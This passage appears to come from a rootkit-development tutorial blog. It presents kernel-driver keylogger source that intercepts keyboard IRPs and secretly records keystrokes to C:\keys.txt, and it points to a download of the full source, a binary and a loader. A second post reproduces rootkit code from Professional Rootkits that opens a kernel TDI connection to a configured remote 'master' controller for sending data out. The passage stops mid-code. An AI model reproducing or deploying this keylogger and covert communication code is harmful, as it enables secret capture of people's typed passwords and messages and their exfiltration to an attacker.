 IoSetCompletionRoutine( newIrp, OnReadCompletion, Irp, TRUE, TRUE, TRUE ); // OnReadCompletion is called after the next-lower driver completes its job; the original Irp is passed as Context
 // set cancel routine to allow driver to unload
 IoSetCancelRoutine( Irp, OnCancel ); // sets up a driver-supplied Cancel routine to be called if the given IRP is canceled
 ....
 // pass new irp in place of old irp
 status = IoCallDriver( oldKeyboardDevice, newIrp );
 ...
} 
 NTSTATUS OnReadCompletion(IN PDEVICE_OBJECT pDeviceObject,
IN PIRP pIrp,
IN PVOID Context)
{
//Read the key from buffer and signal KeyLoggerThread to write it to a file by releasing semaphore
}

 

The completion routine has access to the key code (in the buffer of the Irp) and can easily convert it to a character with a lookup table, but the completion routine itself cannot save the key to a file. That is because a completion routine can run at IRQL = DISPATCH_LEVEL (it is called in whatever context the lower driver completes the Irp), whereas file operations must be done at PASSIVE_LEVEL. If we try to write to a file at DISPATCH_LEVEL the system will crash. To get around this problem, we start a thread from DriverEntry that runs at PASSIVE_LEVEL. This thread waits on a semaphore for a key to be read. The completion routine stores the key data in a shared list and then releases the semaphore; the thread wakes up, takes the entry from the list and saves the character to a file.

   

// keylogger source code
VOID KeyLoggerThread(PVOID StartContext)
{
...
             while( TRUE )

                {

                                // wait for a key

                                KeWaitForSingleObject( &keyboardData.keySemaphore,

                                                Executive,

                                                KernelMode,

                                                FALSE,

                                                NULL );

 

                                pListEntry = ExInterlockedRemoveHeadList( &keyboardData.keyList,

                                                &keyboardData.keyLock );

                               

                                if( keyboardData.terminateFlag == TRUE ) // set when the keylogger is being stopped

                                                PsTerminateSystemThread( STATUS_SUCCESS );

                               

                                // ** get BASE ADDRESS of instance **

                                keyData = CONTAINING_RECORD( pListEntry, KEY_DATA, ListEntry ); // first argument: the address of the field we have; second argument: the type of the containing structure; third argument: the name of that field within the structure

 

                                // convert scan code to key

                                key[0] = key[1] = key[2] = 0; // clear the buffer: nothing is inserted for control keys, so zero is the default value when no character is set

                                GetKey( keyData, key );  // copy the character, or leave key empty if it is a control key

 

                                if( key[0] != 0 )

                                {

                                                if(keyboardData.hLogFile != NULL)

                                                {             

                                                                IO_STATUS_BLOCK io_status;

                                                   

                                                                status = ZwWriteFile(keyboardData.hLogFile,

                                                                                NULL,

                                                                                NULL,

                                                                                NULL,

                                                                                &io_status,

                                                                                &key,

                                                                                strlen(key),

                                                                                NULL,

                                                                                NULL);

                                                }

                                }             

                }
	...
}
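
The CONTAINING_RECORD call in the thread above recovers a pointer to a whole record from a pointer to a field embedded in it. A minimal user-mode sketch of the same idea follows; list_node, sample_record, RECORD_FROM_FIELD and record_id_from_link are hypothetical names made up for the illustration, not part of the keylogger source or of the Windows headers.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for LIST_ENTRY. */
typedef struct list_node {
    struct list_node *next;
    struct list_node *prev;
} list_node;

/* Hypothetical record that embeds a link, the way KEY_DATA embeds ListEntry. */
typedef struct sample_record {
    int       id;     /* payload placed before the link on purpose */
    list_node link;   /* embedded link that list code hands back to us */
} sample_record;

/* Same argument order as CONTAINING_RECORD(address, type, field):
   subtract the field's offset from the field's address to get the
   base address of the enclosing record. */
#define RECORD_FROM_FIELD(address, type, field) \
    ((type *)((char *)(address) - offsetof(type, field)))

/* Given a pointer to the embedded link, return the id of its record. */
int record_id_from_link(list_node *node)
{
    assert(node != NULL);
    sample_record *rec = RECORD_FROM_FIELD(node, sample_record, link);
    return rec->id;
}
```

Because the link is not the first member of sample_record, a plain cast of the link pointer would give the wrong address; the offset subtraction is what makes the recovery correct wherever the field sits in the structure.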

 

 

Figure 3 shows the execution flow of the keylogging process in the rootkit keylogger once the completion routine is defined:

Figure 3 (Keylogger keylogging process)

There is one more thing: the system will crash if we unload the driver, or the user cancels the operation, while an IRP can still call the completion routine. To avoid this problem we keep track of each uncompleted original IRP and our new IRP (by saving the incomplete IRPs in a linked list):

// keylogger source code
NTSTATUS OnKeyboardRead( PDEVICE_OBJECT pDeviceObject,
	PIRP Irp,
	PIO_STACK_LOCATION irpStack )
{
...

                // save old irp

                Irp->Tail.Overlay.DriverContext[0] = newIrp; //we need this in case of cancelation to find the newIrp

                ExInterlockedInsertHeadList( &keyboardData.irpList,

                                &Irp->Tail.Overlay.ListEntry, // linking the original Irp through its own Tail.Overlay.ListEntry also keeps newIrp reachable, via Irp->Tail.Overlay.DriverContext[0]

                                &keyboardData.irpLock );
...
}

NTSTATUS OnReadCompletion(IN PDEVICE_OBJECT pDeviceObject,
	IN PIRP pIrp,
	IN PVOID Context)

...

//After completing a request we remove the Irp from the EntryList:

                KeAcquireSpinLock( &keyboardData.irpLock, &aIrqL ); //second parameter is output

                { // this block removes origIrp from keyboardData.irpList: its processing is done, so nothing needs to be done for it on cancellation or when StopKeylogger is called

                                PLIST_ENTRY listEntry;

                                listEntry = keyboardData.irpList.Flink; //next entry or the first entry when it is the header

                                while( (listEntry != &origIrp->Tail.Overlay.ListEntry)

                                                && (listEntry != &keyboardData.irpList) ) //This condition check if it is the end of the list

                                {

                                                listEntry = listEntry->Flink;

                                }

                                found = (listEntry == &origIrp->Tail.Overlay.ListEntry);

                                if( found )

                                                RemoveEntryList( &origIrp->Tail.Overlay.ListEntry ); //RemoveEntryList removes the entry by setting the Flink member of the entry before Entry to point to the entry after Entry, and the Blink member of the entry after Entry to point to the entry before Entry.

                                                // unlinking origIrp->Tail.Overlay.ListEntry removes the Irp from keyboardData.irpList, because the list links point at this entry

                }

                KeReleaseSpinLock( &keyboardData.irpLock, aIrqL );

...
}
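
The search-and-unlink step in OnReadCompletion can be sketched in portable C with a minimal circular doubly linked list. The names node, list_init, list_insert_head and list_remove_if_present are hypothetical stand-ins for LIST_ENTRY and the kernel list routines, and the sketch is single-threaded, so it omits the spin lock that the driver code holds around the same steps.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for LIST_ENTRY (Flink/Blink). */
typedef struct node {
    struct node *flink;
    struct node *blink;
} node;

/* An empty circular list is a head that points at itself. */
void list_init(node *head)
{
    head->flink = head->blink = head;
}

/* Link entry right after the head. */
void list_insert_head(node *head, node *entry)
{
    entry->flink = head->flink;
    entry->blink = head;
    head->flink->blink = entry;
    head->flink = entry;
}

/* Walk the list until we reach target or come back to the head.
   Unlink target only if it was actually found, and report the result. */
bool list_remove_if_present(node *head, node *target)
{
    assert(head != NULL && target != NULL && target != head);

    node *cur = head->flink;
    while (cur != target && cur != head)
        cur = cur->flink;

    if (cur != target)
        return false;               /* reached the head: not in the list */

    target->blink->flink = target->flink;
    target->flink->blink = target->blink;
    target->flink = target->blink = target;   /* leave it self-linked */
    return true;
}
```

Checking membership before unlinking matters because the entry may already have been taken off the list by another path (for example during cancellation or unload); unlinking an entry that is no longer on the list would corrupt the neighbours' links.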

 

While unloading, we cancel the new IRPs and call the driver with the original IRPs. Both IRPs are reachable from keyboardData.irpList: CONTAINING_RECORD( listEntry, IRP, Tail.Overlay.ListEntry ) retrieves the original Irp, and its Tail.Overlay.DriverContext[0] holds the new Irp.

    

// keylogger source code
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
	...
	if( newKeyboardDevice )
		StopKeylogger( &oldKeyboardDevice, &newKeyboardDevice );

	...
}

void StopKeylogger( PDEVICE_OBJECT* ppOldDevice, //this function will be called from unload in driver
	PDEVICE_OBJECT* ppNewDevice )
{
...
            KeAcquireSpinLock( &keyboardData.irpLock, &irql ); // the second parameter is an output and receives the previous IRQL

                {

                                PLIST_ENTRY listEntry;

                                listEntry = keyboardData.irpList.Flink;

                                while( listEntry != &keyboardData.irpList ) //looping over the remaining irps

                                {

                                                PIRP newIrp, Irp;

 

                                                Irp = (PIRP)(CONTAINING_RECORD( listEntry, IRP, Tail.Overlay.ListEntry )); //the original irp

                                                newIrp = (PIRP)(Irp->Tail.Overlay.DriverContext[0]); //the newIrp we made

                                                // must advance listEntry before unlinking

                                                listEntry = listEntry->Flink;

                                                if( newIrp )

                                                {

                                                                // cancel created irp

                                                                if( IoCancelIrp( newIrp ) ) //if the new irp cannot be cancelled here, its completion routine can still run after the driver is unloaded and crash the system

                                                                {

                                                                                // add original irp to forwarding list

                                                                                Irp->Tail.Overlay.DriverContext[0] = NULL;

                                                                                IoSetCancelRoutine( Irp, NULL ); //clear our cancel routine; the original irp itself is not cancelled

                                                                                RemoveEntryList( &Irp->Tail.Overlay.ListEntry ); //unlinks this entry from keyboardData.irpList

                                                                                InsertHeadList( &forwarding_list, &Irp->Tail.Overlay.ListEntry ); //adds the original Irp to the forwarding_list, which is then processed normally by calling the driver without a completion routine

                                                                }

                                                }

                                }

                }

                KeReleaseSpinLock( &keyboardData.irpLock, irql );

                // forward original irps

                while( !IsListEmpty( &forwarding_list ) )

                { //this block calls the driver with the original irp requests

                                PLIST_ENTRY listEntry;

                                PIRP Irp;

 

                                listEntry = RemoveHeadList( &forwarding_list );

                                Irp = (PIRP)(CONTAINING_RECORD( listEntry, IRP, Tail.Overlay.ListEntry ));

                                IoSkipCurrentIrpStackLocation( Irp );

                                IoCallDriver( oldKeyboardDevice, Irp );

                }
...
}
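
The unload loop depends on two details that are easy to get wrong: CONTAINING_RECORD turns a pointer to the embedded list entry back into a pointer to the enclosing IRP, and the walk advances to the next entry before the current one is unlinked. Below is a minimal user-mode sketch of both. The types (list_entry, request) and helper names are mock stand-ins invented for illustration; they are not part of the keylogger or the DDK.

```c
#include <assert.h>
#include <stddef.h>

/* Mock of the kernel's LIST_ENTRY: a circular doubly linked list node. */
typedef struct list_entry {
    struct list_entry *flink;  /* next entry */
    struct list_entry *blink;  /* previous entry */
} list_entry;

/* Same idea as CONTAINING_RECORD: subtract the field offset from the field address. */
#define CONTAINER_OF(ptr, type, field) \
    ((type *)((char *)(ptr) - offsetof(type, field)))

static void list_init(list_entry *head) { head->flink = head; head->blink = head; }

static void list_insert_head(list_entry *head, list_entry *e) {
    e->flink = head->flink;
    e->blink = head;
    head->flink->blink = e;
    head->flink = e;
}

static void list_remove(list_entry *e) {
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
}

static int list_count(const list_entry *head) {
    int n = 0;
    for (const list_entry *e = head->flink; e != head; e = e->flink) n++;
    return n;
}

/* Mock "IRP": the link lives inside the record, like IRP.Tail.Overlay.ListEntry. */
typedef struct request {
    int id;
    int cancellable;
    list_entry link;
} request;

/* Moves every cancellable request from pending to forwarding; returns how many moved. */
static int move_cancellable(list_entry *pending, list_entry *forwarding) {
    int moved = 0;
    list_entry *e = pending->flink;
    assert(pending != forwarding);
    while (e != pending) {
        request *r = CONTAINER_OF(e, request, link);
        e = e->flink;                 /* advance before r is unlinked */
        if (r->cancellable) {
            list_remove(&r->link);
            list_insert_head(forwarding, &r->link);
            moved++;
        }
    }
    return moved;
}
```

If the walk read e->flink after list_insert_head had run, it would follow the forwarding list instead of the pending list, which is why the listing advances listEntry first.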

 


The complete keylogger source code, a compiled version, and the rootkit loader can be downloaded from here. To learn how to compile and run the keylogger source code, read the introduction to rootkit development. After starting the keylogger, open a text file, type something, and then stop the rootkit. Then open C:\keys.txt to see the logged keystrokes.

Published in Rootkit development
Saturday, 30 May 2015 00:00

low level network programming


Network programming in C is mostly done through sockets, whereas in low-level network programming you build the connection yourself by communicating directly with the network driver. Low-level network programming gives you the power to handle packets before any other application touches them. To process packets just above the transport driver and before other applications, such as a socket-level firewall, you work with the Transport Driver Interface (TDI). Figure 1 shows how the different layers communicate with network devices.


Figure 1 (layers of networking)

The TDI APIs become available by including ntddk.h (together with tdikrnl.h, as in the listing below), but to use these headers you need to write a driver and compile it with the DDK. Because we are working in the kernel, connecting to the network device and initiating a connection from a device driver takes a lot of work: you must open the device, build an IRP and its stack location, assign the transport address, and so on.

To do this you first need to open the device.

Opening the network device

Using the device name "\Device\Tcp" and the predefined TdiTransportAddress name, you get a HANDLE to the device with ZwCreateFile. You then get the file object behind that handle with ObReferenceObjectByHandle and the device object with the IoGetRelatedDeviceObject function.

Building the IRP

To build an IRP you need the device object pointer and the connection attributes. You have the first from the previous section; for the second you use a FILE_FULL_EA_INFORMATION variable. This structure was also used in the previous section, but its contents differ now: we set its name to the predefined TdiConnectionContext value and open the connection endpoint with it. Then we build the IRP with the TdiBuildInternalDeviceControlIrp function, passing TDI_ASSOCIATE_ADDRESS to say that we next want to associate the address with the endpoint, fill it in with TdiBuildAssociateAddress, and send it to the driver with IoCallDriver.

Note: both sections use ZwCreateFile. The first call returns the address handle; the second returns the connection endpoint handle.
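
Both ZwCreateFile calls carry their real argument in an extended-attribute (EA) buffer: a small header, the attribute name with its terminating NUL, and then the value. The following is a user-mode sketch of that layout. It assumes a mock structure (mock_ea_info) that mirrors the field order of FILE_FULL_EA_INFORMATION, and the helper names are hypothetical; it only illustrates where the name and the value end up.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Mock of FILE_FULL_EA_INFORMATION using user-mode types (same field order). */
typedef struct mock_ea_info {
    unsigned int   NextEntryOffset;
    unsigned char  Flags;
    unsigned char  EaNameLength;   /* length of the name, excluding the NUL */
    unsigned short EaValueLength;
    char           EaName[1];      /* name, NUL, then the value bytes */
} mock_ea_info;

/* Bytes needed for one entry: header up to EaName, name plus NUL, value. */
static size_t ea_size(size_t name_len, size_t value_len) {
    return offsetof(mock_ea_info, EaName) + name_len + 1 + value_len;
}

/* Start of the name inside the entry. */
static char *ea_name(mock_ea_info *ea) {
    return (char *)ea + offsetof(mock_ea_info, EaName);
}

/* Start of the value: EaName + EaNameLength + 1. */
static void *ea_value(mock_ea_info *ea) {
    return ea_name(ea) + ea->EaNameLength + 1;
}

/* Allocates and fills one EA entry; the caller frees it. Returns NULL on failure. */
static mock_ea_info *ea_build(const char *name, const void *value, size_t value_len) {
    size_t name_len = strlen(name);
    size_t size = ea_size(name_len, value_len);
    mock_ea_info *ea;
    if (name_len > 255 || value_len > 65535) return NULL;
    if (size < sizeof(mock_ea_info)) size = sizeof(mock_ea_info);
    ea = calloc(1, size);
    if (ea == NULL) return NULL;
    ea->EaNameLength = (unsigned char)name_len;
    ea->EaValueLength = (unsigned short)value_len;
    memcpy(ea_name(ea), name, name_len + 1);   /* copy includes the NUL */
    memcpy(ea_value(ea), value, value_len);
    return ea;
}
```

The size passed along with the buffer should be the size of that particular entry, which is what ea_size computes here and what eaSize holds in the listing further down.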

Preparing to connect

To establish a connection with the server we call TdiBuildInternalDeviceControlIrp with the TDI_CONNECT parameter. Then we fill a TDI_CONNECTION_INFORMATION variable with the server address and port and call TdiBuildConnect. Finally, we call IoCallDriver again.

Sending Data in driver level

We first prepare the IRP using TdiBuildInternalDeviceControlIrp with the TDI_SEND parameter. Then we call TdiBuildSend with the MDL allocated for the buffer to send. Finally, we call the IoCallDriver function.

Note: this must happen after the connection has been established, as described in the previous section.

The code here is taken from Professional Rootkits by Ric Vieler. We start with commManager.h and commManager.c, which define the functions that open the TDI device, connect to a server, and send string data to the server:

// Copyright Ric Vieler, 2006
//c network programming
// Support header for commManager.c

#ifndef _COMM_MANAGER_H_

#define _COMM_MANAGER_H_

 

// TCP device name

#define COMM_TCP_DEVICE_NAME      L"\\Device\\Tcp"

 

// useful macros

#define INETADDR(a, b, c, d) (a + (b<<8) + (c<<16) + (d<<24))

#define HTONL(a) (((a&0xFF)<<24) + ((a&0xFF00)<<8) + ((a&0xFF0000)>>8) + ((a&0xFF000000)>>24)) 

#define HTONS(a) (((0xFF&a)<<8) + ((0xFF00&a)>>8))

 

#define RECEIVE_BUFFER_SIZE  1024

 

NTSTATUS OpenTDIConnection();

void CloseTDIConnection();

NTSTATUS SendToRemoteController( char* buffer );

VOID timerDPC( PKDPC Dpc, PVOID DeferredContext, PVOID sys1, PVOID sys2 );

 

#endif
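
The INETADDR and HTONS macros in the header above build values whose in-memory bytes are in network order on a little-endian host such as x86. They also use their arguments without parentheses, so an expression argument can be regrouped by operator precedence. The sketch below is a user-mode check of both points; the _SAFE and _ORIG macro names and the helper function are hypothetical and are not part of the original header.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* The header's HTONS, copied verbatim under another name for comparison. */
#define HTONS_ORIG(a) (((0xFF&a)<<8) + ((0xFF00&a)>>8))

/* Parenthesized variants: every argument is wrapped before it is used. */
#define INETADDR_SAFE(a, b, c, d) \
    ((uint32_t)(a) | ((uint32_t)(b) << 8) | ((uint32_t)(c) << 16) | ((uint32_t)(d) << 24))
#define HTONS_SAFE(a) \
    ((uint16_t)((((uint16_t)(a) & 0xFFu) << 8) | (((uint16_t)(a) & 0xFF00u) >> 8)))

/* The macros assume a little-endian host; this reports whether we are on one. */
static int host_is_little_endian(void) {
    uint16_t probe = 1;
    unsigned char first;
    memcpy(&first, &probe, 1);
    return first == 1;
}

/* Copies the in-memory bytes of a 32-bit address into out[0..3]. */
static void address_bytes(uint32_t address, unsigned char out[4]) {
    memcpy(out, &address, 4);
}
```

With a plain literal such as HTONS(1234) the original macro gives the same result as the parenthesized one; the difference only shows up when the argument is itself an expression, for example two flags combined with the | operator.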

 

// commManager.c
//c network programming
// Copyright Ric Vieler, 2006
// This file supports a TDI connection to
// masterAddress1.2.3.4 : masterPort

#include <ntddk.h>
#include <tdikrnl.h>
#include <stdio.h>
#include <stdlib.h>
#include "commManager.h"
#include "configManager.h"
#include "driver.h"

// Globals
char* pSendBuffer = NULL;
PMDL pSendMdl = NULL;
PMDL pReceiveMdl = NULL; // not used for receiving data
PFILE_OBJECT pFileObject = NULL;
PDEVICE_OBJECT pDeviceObject = NULL;
PKTIMER pKernelTimer = NULL;
PKDPC pKernelDPC = NULL;
PFILE_FULL_EA_INFORMATION pFileInfo = NULL;

// Completion routine for all events (connect, send and receive)
static NTSTATUS TDICompletionRoutine(IN PDEVICE_OBJECT theDeviceObject,
	IN PIRP theIrp,
	IN PVOID theContextP)
{
	DbgPrint("comint32: TDICompletionRoutine().");
	// KeSetEvent sets the event to the signaled state if it was not already
	// signaled, which releases the matching KeWaitForSingleObject. The second
	// parameter is the priority increment for waiting threads; the third is
	// FALSE because no wait follows immediately.
	if( theContextP != NULL )
		KeSetEvent( (PKEVENT)theContextP, 0, FALSE );
	// this means no further completion routine will be called for the IRP
	return( STATUS_MORE_PROCESSING_REQUIRED );
}

// Open a TDI channel and connect to masterAddress1.2.3.4 : masterPort
NTSTATUS OpenTDIConnection()
{
	int port;
	int address1;
	int address2;
	int address3;
	int address4;
	NTSTATUS status;
	UNICODE_STRING TdiTransportDeviceName;
	OBJECT_ATTRIBUTES TdiAttributes;
	HANDLE TdiAddressHandle;
	HANDLE TdiEndpointHandle;
	IO_STATUS_BLOCK IoStatusBlock;
	PTA_IP_ADDRESS pAddress;
	CONNECTION_CONTEXT connectionContext = NULL;
	ULONG eaSize;
	PIRP pIrp;
	PVOID pAddressFileObject;
	KEVENT irpCompleteEvent;
	KEVENT connectionEvent;
	TA_IP_ADDRESS controllerTaIpAddress;
	ULONG controllerIpAddress;
	USHORT controllerPort;
	TDI_CONNECTION_INFORMATION controllerConnection;
	LARGE_INTEGER timeout;
	static char eaBuffer[ sizeof(FILE_FULL_EA_INFORMATION) +
		TDI_TRANSPORT_ADDRESS_LENGTH +
		sizeof(TA_IP_ADDRESS)];
	// The FILE_FULL_EA_INFORMATION structure provides extended attribute (EA)
	// information. This structure is used primarily by network drivers.
	PFILE_FULL_EA_INFORMATION pEaBuffer = (PFILE_FULL_EA_INFORMATION)eaBuffer;

	// Build Unicode transport device name.
	RtlInitUnicodeString( &TdiTransportDeviceName,
		COMM_TCP_DEVICE_NAME ); // "\Device\Tcp"

	// create object attribs
	InitializeObjectAttributes( &TdiAttributes,
		&TdiTransportDeviceName,
		OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
		0,
		0 );

	pEaBuffer->NextEntryOffset = 0;
	pEaBuffer->Flags = 0;
	pEaBuffer->EaNameLength = TDI_TRANSPORT_ADDRESS_LENGTH;

	// Copy TdiTransportAddress: the client sets the EaName member to the
	// system-defined value TdiTransportAddress
	memcpy( pEaBuffer->EaName,
		TdiTransportAddress,
		pEaBuffer->EaNameLength + 1 );

	// EaValue represents the local host IP address and port
	pEaBuffer->EaValueLength = sizeof(TA_IP_ADDRESS);
	// The value associated with each entry follows the EaName array.
	// That is, an EA's value is located at EaName + (EaNameLength + 1).
	pAddress = (PTA_IP_ADDRESS)
		(pEaBuffer->EaName + pEaBuffer->EaNameLength + 1);
	pAddress->TAAddressCount = 1;
	pAddress->Address[0].AddressLength = TDI_ADDRESS_LENGTH_IP;
	pAddress->Address[0].AddressType = TDI_ADDRESS_TYPE_IP;
	pAddress->Address[0].Address[0].sin_port = 0; // any port
	pAddress->Address[0].Address[0].in_addr = 0; // local address
	memset( pAddress->Address[0].Address[0].sin_zero, 0,
		sizeof(pAddress->Address[0].Address[0].sin_zero) );
	// to see the TA_IP_ADDRESS structure go to: http://msdn.microsoft.com/en-us/library/windows/hardware/ff564243(v=vs.85).aspx
	// to see the pAddress->Address[0].Address[0] structure go to: http://msdn.microsoft.com/en-us/library/windows/hardware/ff565072(v=vs.85).aspx

	// Get the transport device
	status = ZwCreateFile( &TdiAddressHandle, // output
		GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE,
		&TdiAttributes, // OBJECT_ATTRIBUTES initialized above with InitializeObjectAttributes; this names the device
		&IoStatusBlock, // output: receives the final completion status and other information about the requested operation
		0, // AllocationSize
		FILE_ATTRIBUTE_NORMAL, // FileAttributes to set
		FILE_SHARE_READ, // ShareAccess
		FILE_OPEN, // action to perform if the file does or does not exist
		0, // options to apply when the driver creates or opens the file
		pEaBuffer, // optional EaBuffer: device and intermediate drivers normally pass NULL, a TDI client passes the EA that names the transport address
		sizeof(eaBuffer) );
	if( !NT_SUCCESS( status ) )
	{
		DbgPrint("comint32: OpenTDIConnection() ZwCreate #1 failed, Status = %0x", status);
		return STATUS_UNSUCCESSFUL;
	}

	// get object handle
	status = ObReferenceObjectByHandle( TdiAddressHandle,
		FILE_ANY_ACCESS, // requested types of access to the object
		0, // object type
		KernelMode, // access mode for the access check: UserMode or KernelMode
		(PVOID *)&pAddressFileObject, // receives a pointer to the object's body
		NULL );

	// Open a TDI endpoint
	// FIELD_OFFSET returns the byte offset of a named field in a known
	// structure type; EaName is the last member.
	// There is only one connection in this example, so CONNECTION_CONTEXT is not used.
	eaSize = FIELD_OFFSET(FILE_FULL_EA_INFORMATION, EaName) +
		TDI_CONNECTION_CONTEXT_LENGTH + 1 + // for the TdiConnectionContext constant
		sizeof(CONNECTION_CONTEXT);

	// Overwrite pEaBuffer
	// pFileInfo is global and will be used to open the connection. ExAllocatePool
	// allocates pool memory of the specified type and returns a pointer to the block.
	pFileInfo = (PFILE_FULL_EA_INFORMATION)ExAllocatePool(NonPagedPool, eaSize);
	if( pFileInfo == NULL )
	{
		DbgPrint("comint32: OpenTDIConnection() failed to allocate buffer");
		return STATUS_INSUFFICIENT_RESOURCES;
	}

	// Set file info
	memset(pFileInfo, 0, eaSize);
	pFileInfo->NextEntryOffset = 0;
	pFileInfo->Flags = 0;
	pFileInfo->EaNameLength = TDI_CONNECTION_CONTEXT_LENGTH;
	// pFileInfo is for opening the connection, whereas pEaBuffer was for
	// opening the address object (its EaName is TdiTransportAddress)
	memcpy( pFileInfo->EaName,
		TdiConnectionContext,
		pFileInfo->EaNameLength + 1 ); // includes NULL terminator

	// CONNECTION_CONTEXT is a user defined structure used to sort connections
	// There is only one connection in this example, so CONNECTION_CONTEXT is not used
	pFileInfo->EaValueLength = sizeof(CONNECTION_CONTEXT);
	// the value is stored right after EaName and its terminator
	*(CONNECTION_CONTEXT*)(pFileInfo->EaName+(pFileInfo->EaNameLength + 1)) =
		(CONNECTION_CONTEXT) connectionContext; // NULL

	status = ZwCreateFile( &TdiEndpointHandle,
		GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE,
		&TdiAttributes,
		&IoStatusBlock,
		0,
		FILE_ATTRIBUTE_NORMAL,
		FILE_SHARE_READ,
		FILE_OPEN,
		0,
		pFileInfo,
		eaSize ); // pFileInfo holds eaSize bytes, which differs from sizeof(eaBuffer)
	if( !NT_SUCCESS( status ) )
	{
		DbgPrint("comint32: OpenTDIConnection() ZwCreate #2 failed, Status = %0x", status);
		return STATUS_UNSUCCESSFUL;
	}

	// get object handle
	status = ObReferenceObjectByHandle( TdiEndpointHandle,
		FILE_ANY_ACCESS,
		0,
		KernelMode,
		(PVOID *)&pFileObject, // output (global), used by TdiBuildInternalDeviceControlIrp
		NULL );

	// Associate endpoint with address
	// pDeviceObject is global. IoGetRelatedDeviceObject returns a pointer to the
	// device object. We pass pAddressFileObject because it was opened with
	// pEaBuffer, whose EaName is TdiTransportAddress.
	pDeviceObject = IoGetRelatedDeviceObject( pAddressFileObject );

	// Define a completion event
	KeInitializeEvent( &irpCompleteEvent, NotificationEvent, FALSE );

	// Build IO Request Packet.
	// TdiBuildInternalDeviceControlIrp allocates an IRP for a client-initiated
	// internal device control request. The returned IRP is passed to a
	// TdiBuildXxx macro (here TdiBuildAssociateAddress) to set up the I/O stack
	// location of the underlying transport driver before IoCallDriver is called.
	pIrp = TdiBuildInternalDeviceControlIrp( TDI_ASSOCIATE_ADDRESS,
		pDeviceObject,
		pFileObject,
		&irpCompleteEvent,
		&IoStatusBlock );
	if( pIrp == NULL )
	{
		DbgPrint("comint32: No IRP for TDI_ASSOCIATE_ADDRESS");
		return( STATUS_INSUFFICIENT_RESOURCES );
	}

	// Extend the IRP
	// TdiBuildAssociateAddress sets up an internal device control IRP for a
	// TDI_ASSOCIATE_ADDRESS request to the underlying transport, for which the
	// client has already opened an address and a connection endpoint.
	TdiBuildAssociateAddress( pIrp,
		pDeviceObject,
		pFileObject, // file object representing the connection endpoint
		NULL,
		NULL,
		TdiAddressHandle ); // the address

	// set completion routine
	// When a driver completes an IRP it calls IoCompleteRequest, which calls the
	// IoCompletion routine of each higher-level driver in turn until all have
	// been called or one returns STATUS_MORE_PROCESSING_REQUIRED. This call
	// stores the routine's address in the next-lower driver's I/O stack location.
	// The third parameter is the context (our event); parameters 4, 5 and 6 ask
	// for the routine to be called on success, on error and on cancel.
	IoSetCompletionRoutine( pIrp, TDICompletionRoutine, &irpCompleteEvent, TRUE, TRUE, TRUE);

	// Send the packet
	status = IoCallDriver( pDeviceObject, pIrp );

	// Wait
	if( status == STATUS_PENDING )
	{
		DbgPrint("comint32: OpenTDIConnection() Waiting on IRP (associate)...");
		// Blocks until the request has been processed. TDICompletionRoutine then
		// calls KeSetEvent, and because this is a notification event every wait
		// on it is satisfied, so execution continues with the next line.
		KeWaitForSingleObject(&irpCompleteEvent, Executive, KernelMode, FALSE, 0);
	}
	if( ( status != STATUS_SUCCESS) &&
		( status != STATUS_PENDING ) )
	{
		DbgPrint("comint32: OpenTDIConnection() IoCallDriver #1 failed. Status = %0x", status);
		return STATUS_UNSUCCESSFUL;
	}

	// Connect to the remote controller
	KeInitializeEvent(&connectionEvent, NotificationEvent, FALSE);

	// build connection packet; the returned IRP is passed to TdiBuildConnect
	pIrp = TdiBuildInternalDeviceControlIrp( TDI_CONNECT,
		pDeviceObject,
		pFileObject,
		&connectionEvent,
		&IoStatusBlock );
	if( pIrp == NULL )
	{
		DbgPrint("comint32: OpenTDIConnection() could not get an IRP for TDI_CONNECT");
		return( STATUS_INSUFFICIENT_RESOURCES );
	}

	// Initialize controller data
	address1 = atoi(masterAddress1);
	address2 = atoi(masterAddress2);
	address3 = atoi(masterAddress3);
	address4 = atoi(masterAddress4);
	port = atoi(masterPort);
	controllerPort = HTONS(port);
	controllerIpAddress = INETADDR(address1,address2,address3,address4);
	controllerTaIpAddress.TAAddressCount = 1;
	controllerTaIpAddress.Address[0].AddressLength = TDI_ADDRESS_LENGTH_IP;
	controllerTaIpAddress.Address[0].AddressType = TDI_ADDRESS_TYPE_IP;
	controllerTaIpAddress.Address[0].Address[0].sin_port = controllerPort;
	controllerTaIpAddress.Address[0].Address[0].in_addr = controllerIpAddress;
	controllerConnection.UserDataLength = 0;
	controllerConnection.UserData = 0;
	controllerConnection.OptionsLength = 0;
	controllerConnection.Options = 0;
	controllerConnection.RemoteAddressLength = sizeof(controllerTaIpAddress);
	controllerConnection.RemoteAddress = &controllerTaIpAddress;

	// add controller data to the packet. TdiBuildConnect sets
	// IRP_MJ_INTERNAL_DEVICE_CONTROL as the MajorFunction and TDI_CONNECT as the
	// MinorFunction code in the transport's I/O stack location of the given IRP
	TdiBuildConnect( pIrp,
		pDeviceObject, // device object created by the underlying TDI transport driver
		pFileObject, // file object representing the connection endpoint
		NULL, // CompRoutine
		NULL,
		NULL, // Time
		&controllerConnection, // RequestConnectionInfo
		0 );

	// set completion routine
	IoSetCompletionRoutine( pIrp, TDICompletionRoutine, &connectionEvent, TRUE, TRUE, TRUE);

	// Send the packet
	status = IoCallDriver( pDeviceObject, pIrp );

	// wait
	if( status == STATUS_PENDING )
	{
		DbgPrint("comint32: OpenTDIConnection() waiting on IRP (connect)...");
		// blocks until the packet has been processed
		KeWaitForSingleObject(&connectionEvent, Executive, KernelMode, FALSE, 0);
	}
	if( ( status != STATUS_SUCCESS ) &&
		( status != STATUS_PENDING ) )
	{
		DbgPrint("comint32: OpenTDIConnection() Connection failed. Status = %0x", status);
		return( STATUS_UNSUCCESSFUL );
	}

	// Start a Deferred Procedure Call
	// Objects must be non paged
	pKernelTimer = ExAllocatePool( NonPagedPool, sizeof( KTIMER ) ); // global
	pKernelDPC = ExAllocatePool( NonPagedPool, sizeof( KDPC ) ); // global
	timeout.QuadPart = -10;
	KeInitializeTimer( pKernelTimer );
	KeInitializeDpc( pKernelDPC, timerDPC, NULL );
	// KeSetTimerEx sets the absolute or relative interval at which a timer object
	// is set to a signaled state; the period here is 500 ms (1/2 second)
